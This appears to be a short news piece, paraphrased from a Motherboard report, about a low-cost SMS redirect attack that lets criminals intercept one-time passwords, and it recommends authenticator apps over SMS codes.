Though having every feasible thread, new technological changes take place every day to fight hackers and protect user data, and further their privacy. But here's a new attack that has been witnessed recently – to defraud one’s protection against OTP in every online transaction. This whole new attack allows hackers to redirect SMS connected to their systems by the victim's phone number. Through its exploiting services, hackers use business-driven text messaging management services to conduct the attack. In a manner, these attacks are also achievable, at least in the United States, due to the failure of the telecommunications industry, and hackers are at ease. 

"The method of attack, which has not been previously reported or demonstrated in detail, has implications for cybercrime, where criminals often take over target's phone numbers in order to harass them, drain their bank account, or otherwise tear through their digital lives," stated the report from Motherboard late on Monday, 15th of March. 

Joseph Cox, a reporter for the motherboard, was personally attacked and was not really aware of the attack on his cell phone number. The odd thing about the attack is that the hacker is available with just a $16 payment (Rs. 1,160). In the case of Cox, the company providing the services said that the attack was resolved but was not taken care of, for several others. Besides, some firms know the attack, still, CTIA, the commercial organization, is being blamed. 

These services not only allow the attacker to intercept incoming texts but also allow them to answer. Another hacking act frequently performed by hackers is the SMS redirect attack. SIM Swapping and SS7 have already been attacking many users. However, what is interesting about such attacks is that in a few instances the user learns about the exploit because the phone has no network. 

Therefore it’s better not to rely on SMS services to prevent this. Users should use Authenticator apps and log their email account to obtain OTPs, especially for bank-related OTPs. 

"It is better to use an app like Google Authenticator or Authy. Some password managers even have support for 2FA built-in, like 1Password or many of the other free managers we recommend," the report mentioned.